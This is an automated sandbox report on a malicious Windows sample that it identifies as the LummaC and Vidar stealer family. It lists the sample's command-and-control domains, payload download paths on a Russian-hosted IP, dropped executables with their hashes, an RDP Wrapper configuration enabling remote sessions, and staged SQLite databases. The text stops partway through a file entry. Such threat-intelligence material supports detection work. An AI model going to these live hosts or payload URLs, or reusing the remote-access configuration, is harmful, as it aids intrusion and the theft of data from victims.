147.45.44.104	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.67.128.144	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true
172.67.194.216	wallkedsleeoi.shop	United States	13335	CLOUDFLARENETUS	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519784
Start date and time:	2024-09-27 00:27:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	52
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winEXE@67/43@16/14
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 93 Number of non-executed functions: 264
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
18:28:35	API Interceptor	4x Sleep call for process: RegAsm.exe modified
18:29:35	API Interceptor	1x Sleep call for process: BKJKEBGDHD.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.77.130	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
8.46.123.33	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	GvQcD0PvEH.exe	Get hash	malicious	Unknown	Browse
	exe4.bin.bak.exe	Get hash	malicious	BlackMoon, GhostRat	Browse
147.45.44.104	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104/prog/66f4247d51812_lfdsjna.exe
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	147.45.44.104/malesa/66ed86be077bb_12.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
fragnantbui.shop	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	147.45.44.104
	https://bnbvfd.crabdance.com/clients/login.php	Get hash	malicious	Unknown	Browse	147.45.45.70
	https://tmsm.krtra.com/c/R2QnECLcaUYf/mYo0	Get hash	malicious	Unknown	Browse	147.45.47.98
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	147.45.44.104
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	147.45.44.104
CLOUDFLARENETUS	https://majdiwalton.com/	Get hash	malicious	Unknown	Browse	104.16.40.28
	https://h567268.linp067.arubabusiness.it/SI1892190290/am	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://h567268.linp067.arubabusiness.it/SI1892190290/	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://cb-coibseprologen.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	172.64.146.167
	Sign and preview.pdf	Get hash	malicious	Unknown	Browse	104.26.9.129
	http://telkogmx34432.pages.dev/	Get hash	malicious	Unknown	Browse	104.18.11.207
	https://ume.la/tolink.php?to=qADuxA	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://servicemail01orang.wixsite.com/password	Get hash	malicious	Unknown	Browse	172.66.0.227
	http://www.token-webpanel.com/	Get hash	malicious	Unknown	Browse	172.67.70.158
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	172.67.194.216
AS-PUBMATICUS	http://cb-coibseprologen.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	185.64.191.210
	Sign and preview.pdf	Get hash	malicious	Unknown	Browse	185.64.191.210
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	8.46.123.33
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	8.46.123.33
	http://bt-105687.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	185.64.191.210
	https://content.app-us1.com/kd4oo8/2024/09/26/7d3453ba-0845-4df1-80a7-42d15e30f736.pdf	Get hash	malicious	HTMLPhisher	Browse	198.47.127.20
	https://is.gd/fxcRir	Get hash	malicious	Unknown	Browse	198.47.127.18
	https://cancelar-plan-pr0teccion1.w3spaces.com/	Get hash	malicious	Unknown	Browse	198.47.127.19
	https://mail-105280.weeblysite.com/	Get hash	malicious	HTMLPhisher	Browse	198.47.127.205

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://h567268.linp067.arubabusiness.it/SI1892190290/am	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://cb-coibseprologen.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	https://to-gemieezwoll-it0signusw.godaddysites.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	http://attdeskservertyurx.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	188.114.97.3
	https://upholdxyi_login.godaddysites.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	http://eastlink-100612.weeblysite.com/	Get hash	malicious	Unknown	Browse	188.114.97.3
	VL1xZpPp1I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	file.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Vidar	Browse	5.75.211.162
	file.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	5.75.211.162
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	5.75.211.162
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	Baylor financial-RemittanceSeptember 26, 2024_-YTRKOKQTQALJDQKMPCNJ.xlsx	Get hash	malicious	Unknown	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
	http://google.com	Get hash	malicious	LummaC	Browse	104.21.77.130 104.21.4.136 188.114.97.3 172.67.162.108 172.67.128.144 188.114.96.3 104.102.49.254 172.67.194.216
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254
	e.dll	Get hash	malicious	Dridex Dropper	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\RDP Wrapper\rdpwrap.dll	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse
	smss.exe	Get hash	malicious	RMSRemoteAdmin, RDPWrap Tool, xRAT	Browse
	CVE-2024-38143 poc.exe	Get hash	malicious	Codoso Ghost, UACMe	Browse
	LisectAVT_2403002A_44.exe	Get hash	malicious	AveMaria, UACMe	Browse
	6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe	Get hash	malicious	AveMaria, UACMe	Browse
	234880953-042446-sanlccjavap0003-3849.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	YQR4CA11sP.exe	Get hash	malicious	AveMaria, PrivateLoader, UACMe	Browse
	jYHfnNP0MN.exe	Get hash	malicious	AveMaria, Blank Grabber, PrivateLoader, UACMe	Browse
	Filezillawin_94199_patched.exe	Get hash	malicious	Unknown	Browse
C:\ProgramData\BGDGHJEHJJ.exe	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse
C:\ProgramData\BGDGHJEHJJ.exe	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse

Created / dropped Files

C:\Program Files\RDP Wrapper\rdpwrap.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	116736
Entropy (8bit):	5.884975745255681
Encrypted:	false
SSDEEP:	3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
MD5:	461ADE40B800AE80A40985594E1AC236
SHA1:	B3892EEF846C044A2B0785D54A432B3E93A968C8
SHA-256:	798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
SHA-512:	421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 54%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: smss.exe, Detection: malicious, Browse Filename: CVE-2024-38143 poc.exe, Detection: malicious, Browse Filename: LisectAVT_2403002A_44.exe, Detection: malicious, Browse Filename: 6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exe, Detection: malicious, Browse Filename: 234880953-042446-sanlccjavap0003-3849.exe, Detection: malicious, Browse Filename: YQR4CA11sP.exe, Detection: malicious, Browse Filename: jYHfnNP0MN.exe, Detection: malicious, Browse Filename: Filezillawin_94199_patched.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Program Files\RDP Wrapper\rdpwrap.ini

Download File

Process:	C:\Users\user\AppData\Local\Temp\RDPWInst.exe
File Type:	Generic INItialization configuration [SLPolicy]
Category:	dropped
Size (bytes):	443552
Entropy (8bit):	5.4496544667416975
Encrypted:	false
SSDEEP:	768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
MD5:	92BC5FEDB559357AA69D516A628F45DC
SHA1:	6468A9FA0271724E70243EAB49D200F457D3D554
SHA-256:	85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
SHA-512:	87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
Malicious:	false
Preview:	; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

C:\ProgramData\BAFIEGIECGCB\BAFIEG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
SHA-256:	55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
SHA-512:	EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGDGHJEHJJ.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\ProgramData\BKJKEBGDHD.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.662183287075988
Encrypted:	false
SSDEEP:	1536:uZAhxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/LkTRSO6kiz:hhx0I26z/8uz22gaxH2zLiRSO6Jz
MD5:	D02AAA17F2AE30945D65603531DCAE56
SHA1:	17B95FD290773864B58D928D3CA5641C02808D26
SHA-256:	3D0E422CF87C34B396C8D7A2F58DC10321E6D299377EBD08806A4D9DDD2AE203
SHA-512:	34C61409D3EFF365AA0329582CEF186A308C0027085B9D10EAB0E5AA3BC882989670A6D8985A6D7F39A213770E7FCA32342D894CB8F1E5064A8381EF4A29D65A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\BKJKEBGDHD.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...2.@..........."...0..............!... ...@....@.. ....................................`..................................!..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......\...T%..........h,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r6..p(....(O...(.....r(..p(....(....rZ..p(....oE...:....r...p(....rZ..p(.....r]..p(.....{....r]..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\ProgramData\ECBGHCGCBKFI\AAEBAF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\BKECFI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\ECBGHCGCBKFI\CAFBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8508558324143882
Encrypted:	false
SSDEEP:	24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
MD5:	933D6D14518371B212F36C3835794D75
SHA1:	92D056D912B3C0260D379330D3CC0359B57A322B
